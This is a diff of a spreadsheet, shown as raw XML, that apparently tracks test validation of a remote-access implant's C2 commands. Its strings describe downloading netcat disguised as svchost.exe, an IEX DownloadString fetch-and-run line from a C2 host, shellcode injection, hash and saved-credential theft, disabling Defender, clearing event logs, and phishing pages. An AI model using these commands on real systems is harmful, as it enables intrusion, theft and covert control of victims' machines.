--- a/validate-cmd.xlsx
+++ b/validate-cmd.xlsx
@@ -8,9 +8,9 @@
       <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="E:\sharelab\pnt\PentaDrone\"/>
     </mc:Choice>
   </mc:AlternateContent>
-  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{0CDFEFE5-8BC4-4942-9877-9622589A8835}" xr6:coauthVersionLast="41" xr6:coauthVersionMax="43" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
+  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{926AA25E-7722-4A32-BC08-0B4D63F0DDE2}" xr6:coauthVersionLast="41" xr6:coauthVersionMax="43" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
   <bookViews>
-    <workbookView xWindow="-120" yWindow="-120" windowWidth="29040" windowHeight="16440" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
+    <workbookView xWindow="1320" yWindow="2850" windowWidth="17700" windowHeight="12720" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
   </bookViews>
   <sheets>
     <sheet name="Cmde state validation" sheetId="1" r:id="rId1"/>
@@ -18,7 +18,7 @@
     <sheet name="Feuil3" sheetId="3" r:id="rId3"/>
   </sheets>
   <definedNames>
-    <definedName name="_xlnm._FilterDatabase" localSheetId="0" hidden="1">'Cmde state validation'!$A$1:$E$99</definedName>
+    <definedName name="_xlnm._FilterDatabase" localSheetId="0" hidden="1">'Cmde state validation'!$A$1:$E$101</definedName>
     <definedName name="_xlnm._FilterDatabase" localSheetId="1" hidden="1">'Exec validation'!$A$1:$B$81</definedName>
   </definedNames>
   <calcPr calcId="125725"/>
@@ -358,23 +358,17 @@
 </file>
 
 <file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
-<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="460" uniqueCount="257">
+<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="474" uniqueCount="265">
   <si>
     <t xml:space="preserve">  #  !quit   -     Delete all artifacts and clean computer. The end of operations</t>
   </si>
   <si>
-    <t xml:space="preserve">  #  !hello</t>
-  </si>
-  <si>
     <t xml:space="preserve">  #  !speak|you have been, hacked.</t>
   </si>
   <si>
     <t xml:space="preserve">  #  !outlook        - List all pst archives</t>
   </si>
   <si>
-    <t xml:space="preserve">  #  !run|net localgroup adminstrators &gt; c:\windows\temp\ad.txt</t>
-  </si>
-  <si>
     <t xml:space="preserve">  #  !download|http://tools.hackarmoury.com/general_tools/nc/nc.exe|c:\windows\temp\svchost.exe</t>
   </si>
   <si>
@@ -387,9 +381,6 @@
     <t xml:space="preserve">  #  !popup|Administrative credentials are needed to install a pending update. You will be prompted shortly.|UPDATE PENDING</t>
   </si>
   <si>
-    <t xml:space="preserve">  #  !elevate|http://blahblah.com/fjdads/script.raw</t>
-  </si>
-  <si>
     <t xml:space="preserve">  #  !migrate     - Inject shellcode into the process ID (default = explorer) of your choosing or within the context of the running PowerShell process.</t>
   </si>
   <si>
@@ -402,9 +393,6 @@
     <t xml:space="preserve">  #  !wallpaper|http://wallpapercave.com/wp/ky43p3I.jpg/|c:\windows\temp\1.jpg</t>
   </si>
   <si>
-    <t xml:space="preserve"> !geolocate</t>
-  </si>
-  <si>
     <t xml:space="preserve">  #  !jsrat|192.168.10.96     # Handle connexion with: powershell.exe -Exe Bypass -File c:\test\JSRat.ps1  &amp; change listening IP ADDRESS in jsrat file</t>
   </si>
   <si>
@@ -417,9 +405,6 @@
     <t xml:space="preserve"> !clearevent</t>
   </si>
   <si>
-    <t xml:space="preserve"> !logbypass</t>
-  </si>
-  <si>
     <t xml:space="preserve">  #  !macattrib|C:\secret.txt|01/03/2006 12:12 pm</t>
   </si>
   <si>
@@ -594,9 +579,6 @@
     <t>Shell</t>
   </si>
   <si>
-    <t xml:space="preserve">  #  !sniff|10</t>
-  </si>
-  <si>
     <t>Management</t>
   </si>
   <si>
@@ -615,9 +597,6 @@
     <t xml:space="preserve">  #  !sleeps|10|60|90</t>
   </si>
   <si>
-    <t xml:space="preserve"> !geolocategps</t>
-  </si>
-  <si>
     <t xml:space="preserve"> #  !privesc</t>
   </si>
   <si>
@@ -636,12 +615,6 @@
     <t>!http</t>
   </si>
   <si>
-    <t>!firewall|on / off   - Activate or Desactivate firewall</t>
-  </si>
-  <si>
-    <t># !http|80    -    Run http server on specified port and host dedicted files</t>
-  </si>
-  <si>
     <t># !phish|facebook.com|http://xxxxx.ngrok.io/facebook</t>
   </si>
   <si>
@@ -669,12 +642,6 @@
     <t>!enumshare</t>
   </si>
   <si>
-    <t>#!enumshare|toto|F8580EAGFH89725</t>
-  </si>
-  <si>
-    <t>#!enumsession|toto|F8580EAGFH89725</t>
-  </si>
-  <si>
     <t>!enumsession</t>
   </si>
   <si>
@@ -684,9 +651,6 @@
     <t xml:space="preserve">  #  !hashdump</t>
   </si>
   <si>
-    <t xml:space="preserve">  #  !changec2|http:\newc2cserver.com</t>
-  </si>
-  <si>
     <t>!sherlock -  Detect Privesc vulns</t>
   </si>
   <si>
@@ -840,9 +804,6 @@
     <t># !streaming|on / off - take screenshot at every hello (active spy)</t>
   </si>
   <si>
-    <t xml:space="preserve">  #!downexec|ps1/exe|http://url.com/file|file -  example !downexec|ps1|http://script.com/Invoke-DBC2.ps1 |Invoke-DBC2 -Arguments    OR !downexec|exe|http://script.com/bin.exe |-i user -c pc</t>
-  </si>
-  <si>
     <t>#  !choco  - install Choco and some usefull plug</t>
   </si>
   <si>
@@ -981,9 +942,6 @@
     <t xml:space="preserve">!privesc </t>
   </si>
   <si>
-    <t xml:space="preserve"> !elevate </t>
-  </si>
-  <si>
     <t xml:space="preserve"> !persist </t>
   </si>
   <si>
@@ -1053,9 +1011,6 @@
     <t>!windefkill</t>
   </si>
   <si>
-    <t># !extractkey    OR remotely: !extractkey|domain\admin|password</t>
-  </si>
-  <si>
     <t>!extractkey</t>
   </si>
   <si>
@@ -1086,9 +1041,6 @@
     <t xml:space="preserve"> #  !scan       -    Network port scanning like with Nmap, all over the LAN</t>
   </si>
   <si>
-    <t xml:space="preserve"> #  !recon</t>
-  </si>
-  <si>
     <t xml:space="preserve"> #  !wcry       -    Check system against WannaCry MS17-010 vulnerability</t>
   </si>
   <si>
@@ -1129,13 +1081,160 @@
   </si>
   <si>
     <t>!vector|SBOFSBOFSBOF==    Change the encoded string of payload vector</t>
+  </si>
+  <si>
+    <t>!wificreds</t>
+  </si>
+  <si>
+    <t>!wificreds|SSID_NAME - Extract stored WIFI credentials</t>
+  </si>
+  <si>
+    <r>
+      <t xml:space="preserve">  #  !run|2|echo bonjour  -  !run|1|calc   - !run|0|net localgroup adminstrators  # </t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="11"/>
+        <color rgb="FFFF0000"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t>1</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="11"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">= yes run in job    </t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="11"/>
+        <color rgb="FFFF0000"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t>0</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="11"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">= no job ,    </t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="11"/>
+        <color rgb="FFFF0000"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve"> </t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="11"/>
+        <color rgb="FFFF0000"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t>2</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="11"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t>= no job &amp; upload results in txt</t>
+    </r>
+  </si>
+  <si>
+    <t>#!downexec|ps1/exe|http://url.com/file|file -  example !downexec|ps1|http://script.com/Invoke-DBC2.ps1 |Invoke-DBC2 -Arguments    OR !downexec|exe|http://script.com/bin.exe |-i user -c pc</t>
+  </si>
+  <si>
+    <t>!logbypass    -   Invoke-phant0m  invisible mode activated against eventviewer</t>
+  </si>
+  <si>
+    <t>#!enumshare|toto|F8580EAGFH89725  -Enumarate shares, need HASH</t>
+  </si>
+  <si>
+    <t>#!enumsession|toto|F8580EAGFH89725 - Enumarate sessions, need HASH</t>
+  </si>
+  <si>
+    <t>!whoami - Display the current session user</t>
+  </si>
+  <si>
+    <t>!getpid|lsass -- Get the PID of a process</t>
+  </si>
+  <si>
+    <t>#!firewall|on / off|8080   - Desactivate or activate firewall and also specify a port to open in and out</t>
+  </si>
+  <si>
+    <t>!webhistory</t>
+  </si>
+  <si>
+    <t>!webhistory  -  Get All browsers Navigation history</t>
+  </si>
+  <si>
+    <t>!geolocate -  Geolocate zombie using external API</t>
+  </si>
+  <si>
+    <t>!geolocategps  -  Geolocate zombie using device GPS features, more precision.</t>
+  </si>
+  <si>
+    <t>!recon - Grab intelligence about victim environment (computers, networks, shares, security,...etc) ALWAYS use it FIRST</t>
+  </si>
+  <si>
+    <t>!extractkey OR remotely: !extractkey|domain\admin|password  - Quietly digging up saved session information for PuTTY, WinSCP, FileZilla, SuperPuTTY, and RDP</t>
+  </si>
+  <si>
+    <t># !http|8080  -  setup local http server and host a page (Efficient if used with DNSSPOOF: you setup phishing page and you host redir.html To redirect local victim to your phishing page</t>
+  </si>
+  <si>
+    <t xml:space="preserve">  #  !sniff|10  - Capture TCP/IP packet - Open with Microsoft Message Analyzer</t>
+  </si>
+  <si>
+    <t xml:space="preserve">  #  !hello   - Ping C2 server</t>
+  </si>
+  <si>
+    <t xml:space="preserve">  #  !changec2|http:\newc2cserver.com  -  switch C2 server</t>
+  </si>
+  <si>
+    <t># !runas|IEX(New-Object Net.WebClient).DownloadString("http://c2/link/pnt.ps1"))</t>
+  </si>
+  <si>
+    <t>!runas</t>
+  </si>
+  <si>
+    <t xml:space="preserve">!getsystem - Try various privesc technic </t>
+  </si>
+  <si>
+    <t>!getsystem</t>
   </si>
 </sst>
 </file>
 
 <file path=xl/styles.xml><?xml version="1.0" encoding="utf-8"?>
 <styleSheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:x16r2="http://schemas.microsoft.com/office/spreadsheetml/2015/02/main" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" mc:Ignorable="x14ac x16r2 xr">
-  <fonts count="4" x14ac:knownFonts="1">
+  <fonts count="6" x14ac:knownFonts="1">
     <font>
       <sz val="11"/>
       <color theme="1"/>
@@ -1163,6 +1262,21 @@
       <color indexed="81"/>
       <name val="Tahoma"/>
       <family val="2"/>
+    </font>
+    <font>
+      <sz val="11"/>
+      <color rgb="FFFF0000"/>
+      <name val="Calibri"/>
+      <family val="2"/>
+      <scheme val="minor"/>
+    </font>
+    <font>
+      <b/>
+      <sz val="11"/>
+      <color rgb="FFFF0000"/>
+      <name val="Calibri"/>
+      <family val="2"/>
+      <scheme val="minor"/>
     </font>
   </fonts>
   <fills count="4">
@@ -2301,16 +2415,16 @@
 
 <file path=xl/worksheets/sheet1.xml><?xml version="1.0" encoding="utf-8"?>
 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:xdr="http://schemas.openxmlformats.org/drawingml/2006/spreadsheetDrawing" xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="x14ac xr xr2 xr3" xr:uid="{00000000-0001-0000-0000-000000000000}">
-  <sheetPr codeName="Feuil1"/>
-  <dimension ref="A1:U99"/>
+  <sheetPr codeName="Feuil1" filterMode="1"/>
+  <dimension ref="A1:U102"/>
   <sheetViews>
-    <sheetView tabSelected="1" topLeftCell="A49" zoomScale="80" zoomScaleNormal="80" workbookViewId="0">
-      <selection activeCell="D87" sqref="D87"/>
+    <sheetView tabSelected="1" zoomScale="80" zoomScaleNormal="80" workbookViewId="0">
+      <selection activeCell="B102" sqref="B102"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr baseColWidth="10" defaultRowHeight="15" x14ac:dyDescent="0.25"/>
   <cols>
-    <col min="1" max="1" width="3.5703125" customWidth="1"/>
+    <col min="1" max="1" width="4.42578125" bestFit="1" customWidth="1"/>
     <col min="2" max="2" width="20.5703125" bestFit="1" customWidth="1"/>
     <col min="3" max="3" width="20" style="1" customWidth="1"/>
     <col min="4" max="4" width="11.7109375" style="6" customWidth="1"/>
@@ -2324,16 +2438,16 @@
   <sheetData>
     <row r="1" spans="1:21" s="4" customFormat="1" ht="15.75" x14ac:dyDescent="0.25">
       <c r="B1" s="2" t="s">
-        <v>41</v>
+        <v>36</v>
       </c>
       <c r="C1" s="3" t="s">
-        <v>228</v>
+        <v>214</v>
       </c>
       <c r="D1" s="5" t="s">
+        <v>55</v>
+      </c>
+      <c r="E1" s="7" t="s">
         <v>60</v>
-      </c>
-      <c r="E1" s="7" t="s">
-        <v>65</v>
       </c>
       <c r="F1" s="2"/>
       <c r="G1" s="2"/>
@@ -2347,488 +2461,488 @@
       <c r="O1" s="2"/>
       <c r="P1" s="2"/>
     </row>
-    <row r="2" spans="1:21" x14ac:dyDescent="0.25">
+    <row r="2" spans="1:21" hidden="1" x14ac:dyDescent="0.25">
       <c r="A2">
         <v>1</v>
       </c>
       <c r="B2" t="s">
-        <v>79</v>
+        <v>73</v>
       </c>
       <c r="C2" s="1" t="s">
-        <v>227</v>
+        <v>213</v>
       </c>
       <c r="E2" t="s">
         <v>0</v>
       </c>
     </row>
-    <row r="3" spans="1:21" x14ac:dyDescent="0.25">
+    <row r="3" spans="1:21" hidden="1" x14ac:dyDescent="0.25">
       <c r="A3">
         <v>2</v>
       </c>
       <c r="B3" t="s">
-        <v>79</v>
+        <v>73</v>
       </c>
       <c r="C3" s="1" t="s">
-        <v>226</v>
+        <v>212</v>
       </c>
       <c r="D3" s="6" t="s">
-        <v>63</v>
+        <v>58</v>
       </c>
       <c r="E3" t="s">
-        <v>1</v>
-      </c>
-    </row>
-    <row r="4" spans="1:21" x14ac:dyDescent="0.25">
+        <v>259</v>
+      </c>
+    </row>
+    <row r="4" spans="1:21" hidden="1" x14ac:dyDescent="0.25">
       <c r="A4">
         <v>3</v>
       </c>
       <c r="B4" t="s">
-        <v>79</v>
+        <v>73</v>
       </c>
       <c r="C4" s="1" t="s">
-        <v>225</v>
+        <v>211</v>
       </c>
       <c r="D4" s="6" t="s">
-        <v>63</v>
+        <v>58</v>
       </c>
       <c r="E4" t="s">
-        <v>108</v>
+        <v>260</v>
       </c>
       <c r="Q4" t="s">
-        <v>66</v>
+        <v>61</v>
       </c>
       <c r="U4" t="s">
-        <v>42</v>
-      </c>
-    </row>
-    <row r="5" spans="1:21" x14ac:dyDescent="0.25">
+        <v>37</v>
+      </c>
+    </row>
+    <row r="5" spans="1:21" hidden="1" x14ac:dyDescent="0.25">
       <c r="A5">
         <v>4</v>
       </c>
       <c r="B5" t="s">
-        <v>75</v>
+        <v>70</v>
       </c>
       <c r="C5" s="1" t="s">
-        <v>224</v>
+        <v>210</v>
       </c>
       <c r="D5" s="6" t="s">
-        <v>63</v>
+        <v>58</v>
       </c>
       <c r="E5" t="s">
-        <v>25</v>
+        <v>20</v>
       </c>
       <c r="Q5" t="s">
-        <v>67</v>
+        <v>62</v>
       </c>
       <c r="R5" t="s">
-        <v>43</v>
+        <v>38</v>
       </c>
       <c r="S5" t="s">
-        <v>63</v>
+        <v>58</v>
       </c>
       <c r="U5" t="s">
-        <v>44</v>
-      </c>
-    </row>
-    <row r="6" spans="1:21" x14ac:dyDescent="0.25">
+        <v>39</v>
+      </c>
+    </row>
+    <row r="6" spans="1:21" hidden="1" x14ac:dyDescent="0.25">
       <c r="A6">
         <v>5</v>
       </c>
       <c r="B6" t="s">
-        <v>80</v>
+        <v>74</v>
       </c>
       <c r="C6" s="1" t="s">
-        <v>223</v>
+        <v>209</v>
       </c>
       <c r="D6" s="6" t="s">
-        <v>63</v>
+        <v>58</v>
       </c>
       <c r="E6" t="s">
-        <v>2</v>
+        <v>1</v>
       </c>
       <c r="Q6" t="s">
-        <v>81</v>
+        <v>75</v>
       </c>
       <c r="S6" t="s">
-        <v>61</v>
+        <v>56</v>
       </c>
       <c r="U6" t="s">
-        <v>45</v>
-      </c>
-    </row>
-    <row r="7" spans="1:21" x14ac:dyDescent="0.25">
+        <v>40</v>
+      </c>
+    </row>
+    <row r="7" spans="1:21" hidden="1" x14ac:dyDescent="0.25">
       <c r="A7">
         <v>6</v>
       </c>
       <c r="B7" t="s">
-        <v>70</v>
+        <v>65</v>
       </c>
       <c r="C7" s="1" t="s">
-        <v>222</v>
+        <v>208</v>
       </c>
       <c r="D7" s="6" t="s">
+        <v>58</v>
+      </c>
+      <c r="E7" t="s">
+        <v>255</v>
+      </c>
+      <c r="Q7" t="s">
         <v>63</v>
       </c>
-      <c r="E7" t="s">
-        <v>242</v>
-      </c>
-      <c r="Q7" t="s">
-        <v>68</v>
-      </c>
       <c r="S7" t="s">
-        <v>62</v>
+        <v>57</v>
       </c>
       <c r="U7" t="s">
-        <v>46</v>
-      </c>
-    </row>
-    <row r="8" spans="1:21" x14ac:dyDescent="0.25">
+        <v>41</v>
+      </c>
+    </row>
+    <row r="8" spans="1:21" hidden="1" x14ac:dyDescent="0.25">
       <c r="A8">
         <v>7</v>
       </c>
       <c r="B8" t="s">
-        <v>79</v>
+        <v>73</v>
       </c>
       <c r="C8" s="1" t="s">
-        <v>221</v>
+        <v>207</v>
       </c>
       <c r="E8" t="s">
-        <v>27</v>
+        <v>22</v>
       </c>
       <c r="Q8" t="s">
-        <v>69</v>
+        <v>64</v>
       </c>
       <c r="S8" t="s">
-        <v>154</v>
+        <v>142</v>
       </c>
       <c r="U8" t="s">
-        <v>48</v>
-      </c>
-    </row>
-    <row r="9" spans="1:21" x14ac:dyDescent="0.25">
+        <v>43</v>
+      </c>
+    </row>
+    <row r="9" spans="1:21" hidden="1" x14ac:dyDescent="0.25">
       <c r="A9">
         <v>8</v>
       </c>
       <c r="B9" t="s">
-        <v>74</v>
+        <v>69</v>
       </c>
       <c r="C9" s="1" t="s">
-        <v>220</v>
+        <v>206</v>
       </c>
       <c r="D9" s="6" t="s">
-        <v>63</v>
+        <v>58</v>
       </c>
       <c r="E9" t="s">
-        <v>83</v>
+        <v>77</v>
       </c>
       <c r="Q9" t="s">
-        <v>70</v>
+        <v>65</v>
       </c>
       <c r="R9" t="s">
-        <v>47</v>
+        <v>42</v>
       </c>
       <c r="U9" t="s">
-        <v>49</v>
-      </c>
-    </row>
-    <row r="10" spans="1:21" x14ac:dyDescent="0.25">
+        <v>44</v>
+      </c>
+    </row>
+    <row r="10" spans="1:21" hidden="1" x14ac:dyDescent="0.25">
       <c r="A10">
         <v>9</v>
       </c>
       <c r="B10" t="s">
-        <v>74</v>
+        <v>69</v>
       </c>
       <c r="C10" s="1" t="s">
-        <v>219</v>
+        <v>205</v>
       </c>
       <c r="D10" s="6" t="s">
-        <v>61</v>
+        <v>56</v>
       </c>
       <c r="E10" t="s">
-        <v>24</v>
+        <v>19</v>
       </c>
       <c r="Q10" t="s">
-        <v>71</v>
+        <v>66</v>
       </c>
       <c r="U10" t="s">
-        <v>50</v>
-      </c>
-    </row>
-    <row r="11" spans="1:21" x14ac:dyDescent="0.25">
+        <v>45</v>
+      </c>
+    </row>
+    <row r="11" spans="1:21" hidden="1" x14ac:dyDescent="0.25">
       <c r="A11">
         <v>10</v>
       </c>
       <c r="B11" t="s">
-        <v>74</v>
+        <v>69</v>
       </c>
       <c r="C11" s="1" t="s">
-        <v>218</v>
+        <v>204</v>
       </c>
       <c r="D11" s="6" t="s">
-        <v>63</v>
+        <v>58</v>
       </c>
       <c r="E11" t="s">
-        <v>82</v>
+        <v>76</v>
       </c>
       <c r="Q11" t="s">
-        <v>72</v>
+        <v>67</v>
       </c>
       <c r="U11" t="s">
-        <v>51</v>
-      </c>
-    </row>
-    <row r="12" spans="1:21" x14ac:dyDescent="0.25">
+        <v>46</v>
+      </c>
+    </row>
+    <row r="12" spans="1:21" hidden="1" x14ac:dyDescent="0.25">
       <c r="A12">
         <v>11</v>
       </c>
       <c r="B12" t="s">
-        <v>73</v>
+        <v>68</v>
       </c>
       <c r="C12" s="1" t="s">
-        <v>217</v>
+        <v>203</v>
       </c>
       <c r="E12" t="s">
-        <v>3</v>
+        <v>2</v>
       </c>
       <c r="Q12" t="s">
-        <v>73</v>
+        <v>68</v>
       </c>
       <c r="U12" t="s">
-        <v>52</v>
-      </c>
-    </row>
-    <row r="13" spans="1:21" x14ac:dyDescent="0.25">
+        <v>47</v>
+      </c>
+    </row>
+    <row r="13" spans="1:21" hidden="1" x14ac:dyDescent="0.25">
       <c r="A13">
         <v>12</v>
       </c>
       <c r="B13" t="s">
-        <v>72</v>
+        <v>67</v>
       </c>
       <c r="C13" s="1" t="s">
-        <v>216</v>
+        <v>202</v>
       </c>
       <c r="D13" s="6" t="s">
-        <v>63</v>
+        <v>58</v>
       </c>
       <c r="E13" t="s">
-        <v>4</v>
+        <v>243</v>
       </c>
       <c r="Q13" t="s">
-        <v>74</v>
+        <v>69</v>
       </c>
       <c r="U13" t="s">
-        <v>53</v>
-      </c>
-    </row>
-    <row r="14" spans="1:21" x14ac:dyDescent="0.25">
+        <v>48</v>
+      </c>
+    </row>
+    <row r="14" spans="1:21" hidden="1" x14ac:dyDescent="0.25">
       <c r="A14">
         <v>13</v>
       </c>
       <c r="B14" t="s">
-        <v>72</v>
+        <v>67</v>
       </c>
       <c r="C14" s="1" t="s">
-        <v>215</v>
+        <v>201</v>
       </c>
       <c r="E14" t="s">
-        <v>160</v>
+        <v>244</v>
       </c>
       <c r="Q14" t="s">
-        <v>75</v>
+        <v>70</v>
       </c>
       <c r="U14" t="s">
-        <v>54</v>
-      </c>
-    </row>
-    <row r="15" spans="1:21" x14ac:dyDescent="0.25">
+        <v>49</v>
+      </c>
+    </row>
+    <row r="15" spans="1:21" hidden="1" x14ac:dyDescent="0.25">
       <c r="A15">
         <v>14</v>
       </c>
       <c r="B15" t="s">
-        <v>76</v>
+        <v>71</v>
       </c>
       <c r="C15" s="1" t="s">
-        <v>214</v>
+        <v>200</v>
       </c>
       <c r="D15" s="6" t="s">
-        <v>63</v>
+        <v>58</v>
       </c>
       <c r="E15" t="s">
-        <v>5</v>
+        <v>3</v>
       </c>
       <c r="Q15" t="s">
-        <v>76</v>
+        <v>71</v>
       </c>
       <c r="U15" t="s">
-        <v>55</v>
-      </c>
-    </row>
-    <row r="16" spans="1:21" x14ac:dyDescent="0.25">
+        <v>50</v>
+      </c>
+    </row>
+    <row r="16" spans="1:21" hidden="1" x14ac:dyDescent="0.25">
       <c r="A16">
         <v>15</v>
       </c>
       <c r="B16" t="s">
-        <v>80</v>
+        <v>74</v>
       </c>
       <c r="C16" s="1" t="s">
-        <v>213</v>
+        <v>199</v>
       </c>
       <c r="E16" t="s">
-        <v>233</v>
+        <v>218</v>
       </c>
       <c r="Q16" t="s">
-        <v>77</v>
+        <v>72</v>
       </c>
       <c r="U16" t="s">
-        <v>56</v>
-      </c>
-    </row>
-    <row r="17" spans="1:21" x14ac:dyDescent="0.25">
+        <v>51</v>
+      </c>
+    </row>
+    <row r="17" spans="1:21" hidden="1" x14ac:dyDescent="0.25">
       <c r="A17">
         <v>16</v>
       </c>
       <c r="B17" t="s">
-        <v>72</v>
+        <v>67</v>
       </c>
       <c r="C17" s="1" t="s">
-        <v>212</v>
+        <v>198</v>
       </c>
       <c r="D17" s="6" t="s">
-        <v>154</v>
+        <v>142</v>
       </c>
       <c r="E17" t="s">
-        <v>6</v>
+        <v>4</v>
       </c>
       <c r="Q17" t="s">
-        <v>79</v>
+        <v>73</v>
       </c>
       <c r="U17" t="s">
-        <v>57</v>
-      </c>
-    </row>
-    <row r="18" spans="1:21" x14ac:dyDescent="0.25">
+        <v>52</v>
+      </c>
+    </row>
+    <row r="18" spans="1:21" hidden="1" x14ac:dyDescent="0.25">
       <c r="A18">
         <v>17</v>
       </c>
       <c r="B18" t="s">
-        <v>79</v>
+        <v>73</v>
       </c>
       <c r="C18" s="1" t="s">
-        <v>211</v>
+        <v>197</v>
       </c>
       <c r="D18" s="6" t="s">
-        <v>63</v>
+        <v>58</v>
       </c>
       <c r="E18" t="s">
-        <v>84</v>
+        <v>78</v>
       </c>
       <c r="Q18" t="s">
-        <v>80</v>
+        <v>74</v>
       </c>
       <c r="U18" t="s">
-        <v>58</v>
-      </c>
-    </row>
-    <row r="19" spans="1:21" x14ac:dyDescent="0.25">
+        <v>53</v>
+      </c>
+    </row>
+    <row r="19" spans="1:21" hidden="1" x14ac:dyDescent="0.25">
       <c r="A19">
         <v>18</v>
       </c>
       <c r="B19" t="s">
-        <v>80</v>
+        <v>74</v>
       </c>
       <c r="C19" s="1" t="s">
-        <v>115</v>
+        <v>103</v>
       </c>
       <c r="D19" s="6" t="s">
-        <v>63</v>
+        <v>58</v>
       </c>
       <c r="E19" t="s">
-        <v>114</v>
+        <v>102</v>
       </c>
       <c r="U19" t="s">
-        <v>59</v>
-      </c>
-    </row>
-    <row r="20" spans="1:21" x14ac:dyDescent="0.25">
+        <v>54</v>
+      </c>
+    </row>
+    <row r="20" spans="1:21" hidden="1" x14ac:dyDescent="0.25">
       <c r="A20">
         <v>19</v>
       </c>
       <c r="B20" t="s">
-        <v>79</v>
+        <v>73</v>
       </c>
       <c r="C20" s="1" t="s">
-        <v>210</v>
+        <v>196</v>
       </c>
       <c r="D20" s="6" t="s">
-        <v>63</v>
+        <v>58</v>
       </c>
       <c r="E20" t="s">
-        <v>7</v>
-      </c>
-    </row>
-    <row r="21" spans="1:21" x14ac:dyDescent="0.25">
+        <v>5</v>
+      </c>
+    </row>
+    <row r="21" spans="1:21" hidden="1" x14ac:dyDescent="0.25">
       <c r="A21">
         <v>20</v>
       </c>
       <c r="B21" t="s">
-        <v>70</v>
+        <v>65</v>
       </c>
       <c r="C21" s="1" t="s">
-        <v>238</v>
+        <v>223</v>
       </c>
       <c r="E21" t="s">
-        <v>241</v>
-      </c>
-    </row>
-    <row r="22" spans="1:21" x14ac:dyDescent="0.25">
+        <v>226</v>
+      </c>
+    </row>
+    <row r="22" spans="1:21" hidden="1" x14ac:dyDescent="0.25">
       <c r="A22">
         <v>21</v>
       </c>
       <c r="B22" t="s">
-        <v>70</v>
+        <v>65</v>
       </c>
       <c r="C22" s="1" t="s">
-        <v>237</v>
+        <v>222</v>
       </c>
       <c r="D22" s="6" t="s">
-        <v>63</v>
+        <v>58</v>
       </c>
       <c r="E22" t="s">
-        <v>243</v>
-      </c>
-    </row>
-    <row r="23" spans="1:21" x14ac:dyDescent="0.25">
+        <v>227</v>
+      </c>
+    </row>
+    <row r="23" spans="1:21" hidden="1" x14ac:dyDescent="0.25">
       <c r="A23">
         <v>22</v>
       </c>
       <c r="B23" t="s">
-        <v>80</v>
+        <v>74</v>
       </c>
       <c r="C23" s="1" t="s">
-        <v>209</v>
+        <v>195</v>
       </c>
       <c r="D23" s="6" t="s">
-        <v>63</v>
+        <v>58</v>
       </c>
       <c r="E23" t="s">
-        <v>8</v>
-      </c>
-    </row>
-    <row r="24" spans="1:21" x14ac:dyDescent="0.25">
+        <v>6</v>
+      </c>
+    </row>
+    <row r="24" spans="1:21" hidden="1" x14ac:dyDescent="0.25">
       <c r="A24">
         <v>23</v>
       </c>
       <c r="B24" t="s">
-        <v>67</v>
+        <v>62</v>
       </c>
       <c r="C24" s="1" t="s">
-        <v>208</v>
+        <v>194</v>
       </c>
       <c r="D24" s="6" t="s">
-        <v>63</v>
+        <v>58</v>
       </c>
       <c r="E24" t="s">
-        <v>158</v>
+        <v>146</v>
       </c>
     </row>
     <row r="25" spans="1:21" x14ac:dyDescent="0.25">
@@ -2836,16 +2950,16 @@
         <v>24</v>
       </c>
       <c r="B25" t="s">
-        <v>81</v>
+        <v>75</v>
       </c>
       <c r="C25" s="1" t="s">
-        <v>207</v>
+        <v>262</v>
       </c>
       <c r="D25" s="6" t="s">
-        <v>61</v>
+        <v>56</v>
       </c>
       <c r="E25" t="s">
-        <v>9</v>
+        <v>261</v>
       </c>
     </row>
     <row r="26" spans="1:21" x14ac:dyDescent="0.25">
@@ -2853,16 +2967,16 @@
         <v>25</v>
       </c>
       <c r="B26" t="s">
-        <v>81</v>
+        <v>75</v>
       </c>
       <c r="C26" s="1" t="s">
-        <v>206</v>
+        <v>193</v>
       </c>
       <c r="D26" s="6" t="s">
